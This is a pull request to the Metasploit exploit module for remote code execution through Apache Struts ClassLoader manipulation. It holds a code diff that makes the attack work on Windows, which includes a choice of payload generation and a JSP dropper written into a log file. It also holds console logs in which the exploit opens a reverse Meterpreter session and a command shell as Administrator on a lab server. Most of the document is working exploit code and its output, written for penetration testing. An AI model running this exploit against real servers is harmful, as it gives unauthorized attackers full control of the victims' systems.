### PR TITLE
Fix struts_code_exec_classloader on windows

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -150,6 +150,8 @@ class Metasploit3 < Msf::Exploit::Remote
         output << l
       elsif l =~ /<%/
         next
+      elsif l=~ /%>/
+        next
       elsif l.chomp.empty?
         next
       else
@@ -163,10 +165,18 @@ class Metasploit3 < Msf::Exploit::Remote
     if target['Arch'] == ARCH_JAVA
       jsp = fix(payload.encoded)
     else
-      payload_exe = generate_payload_exe
+      if target['Platform'] == 'win'
+        payload_exe = Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "exe-small", {:arch => target.arch, :platform => target.platform})
+      else
+        payload_exe = generate_payload_exe
+      end
       payload_file = rand_text_alphanumeric(4 + rand(4))
       jsp = jsp_dropper(payload_file, payload_exe)
-      register_files_for_cleanup(payload_file)
+      if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
+        register_files_for_cleanup("../webapps/ROOT/#{payload_file}")
+      else
+        register_files_for_cleanup(payload_file)
+      end
     end
 
     jsp
@@ -193,10 +203,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Check if the log file exists and has been flushed
 
-    if check_log_file(normalize_uri(target_uri.to_s))
-      register_files_for_cleanup(@jsp_file)
-    else
+    unless check_log_file(normalize_uri(target_uri.to_s))
       fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
+    end
+
+    if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
+      register_files_for_cleanup("../webapps/ROOT/#{@jsp_file}")
+    else
+      register_files_for_cleanup(@jsp_file)
     end
 
     # Prepare the JSP
@@ -213,7 +227,9 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # Check log file... enjoy shell!
-    check_log_file(random_request)
+    unless target['Arch'] == ARCH_JAVA
+      check_log_file(random_request)
+    end
 
     # No matter what happened, try to 'restore' the Class Loader
     properties = {
@@ -223,6 +239,11 @@ class Metasploit3 < Msf::Exploit::Remote
         :file_date_format => ''
     }
     modify_class_loader(properties)
+
+    if target['Arch'] == ARCH_JAVA
+      send_request_cgi({ 'uri'     => normalize_uri("/", @jsp_file) })
+    end
+
   end
 
 end


### PR DESCRIPTION
It has been reported which modules/exploits/multi/http/struts_code_exec_classloader  was failing on Windows systems. After checking on a Windows 2003 SP2 installation I confirmed.
- native payloads were failing because the EXE with the payload was too long, the request was not being dumped to the log file. I'm generating the exe with `exe-small` on windows in order to avoid this problem (the easy fix).
- The ARCH_JAVA (jsp) payloads were failing while the crazy execution/restore.... it was busting payload. I just switched to restore things, and then a single query to execute the JSP payload. Makes ARCH_JAVA to work smoothly with the windows target.
## Verification
- [x] Install windows sytem, with java 7.67, tomcat 8.0.5 and the blank application from struts 2.3.16.1
- [x] Ensure windows target is working
## Tests
- Windows (native target)

```
msf exploit(struts_code_exec_classloader) > set target 2
target => 2
msf exploit(struts_code_exec_classloader) > set payload windows/meterpreter/reverse_tcp
rpayload => windows/meterpreter/reverse_tcp
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.234:8080 - Modifying Class Loader...
[*] 172.16.158.234:8080 - Waiting for the server to flush the logfile
[+] 172.16.158.234:8080 - Log file flushed at http://172.16.158.234:8080/Mx2ak53.jsp
[*] 172.16.158.234:8080 - Generating JSP...
[*] 172.16.158.234:8080 - Dumping JSP into the logfile...
[*] 172.16.158.234:8080 - Waiting for the server to flush the logfile
[+] 172.16.158.234:8080 - Log file flushed at http://172.16.158.234:8080/Mx2ak53.jsp
[*] Sending stage (769536 bytes) to 172.16.158.234
[*] Meterpreter session 13 opened (172.16.158.1:4444 -> 172.16.158.234:4518) at 2014-09-10 17:59:39 -0500
[+] Deleted ../webapps/ROOT/Mx2ak53.jsp
[!] This exploit may require manual cleanup of '../webapps/ROOT/DUs4Ym' on the target

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
```
- Windows with ARCH_JAVA (jsp) 

```
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.234:8080 - Modifying Class Loader...
[*] 172.16.158.234:8080 - Waiting for the server to flush the logfile
[+] 172.16.158.234:8080 - Log file flushed at http://172.16.158.234:8080/T8o598.jsp
[*] 172.16.158.234:8080 - Generating JSP...
[*] 172.16.158.234:8080 - Dumping JSP into the logfile...
[*] Command shell session 12 opened (172.16.158.1:4444 -> 172.16.158.234:4517) at 2014-09-10 17:58:21 -0500
[+] Deleted T8o598.jsp

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\My Documents\Downloads\apache-tomcat-8.0.5-windows-x86\apache-tomcat-8.0.5\bin>echo 219995308;echo mqvjdTGVkHeKEzkjnQWxAgccpkteGzuK
219995308;echo mqvjdTGVkHeKEzkjnQWxAgccpkteGzuK

C:\Documents and Settings\Administrator\My Documents\Downloads\apache-tomcat-8.0.5-windows-x86\apache-tomcat-8.0.5\bin>rm -f "T8o598.jsp" >/dev/null ; echo ' & attrib.exe -r "T8o598.jsp" & del.exe /f /q "T8o598.jsp" & echo " ' >/dev/null;echo JYxJFRgmaJzunvmwhMROGEUbDMaEJHMP
File not found - T8o598.jsp
" ' >/dev/null;echo JYxJFRgmaJzunvmwhMROGEUbDMaEJHMP

C:\Documents and Settings\Administrator\My Documents\Downloads\apache-tomcat-8.0.5-windows-x86\apache-tomcat-8.0.5\bin>
C:\Documents and Settings\Administrator\My Documents\Downloads\apache-tomcat-8.0.5-windows-x86\apache-tomcat-8.0.5\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is ACC9-F54C
```
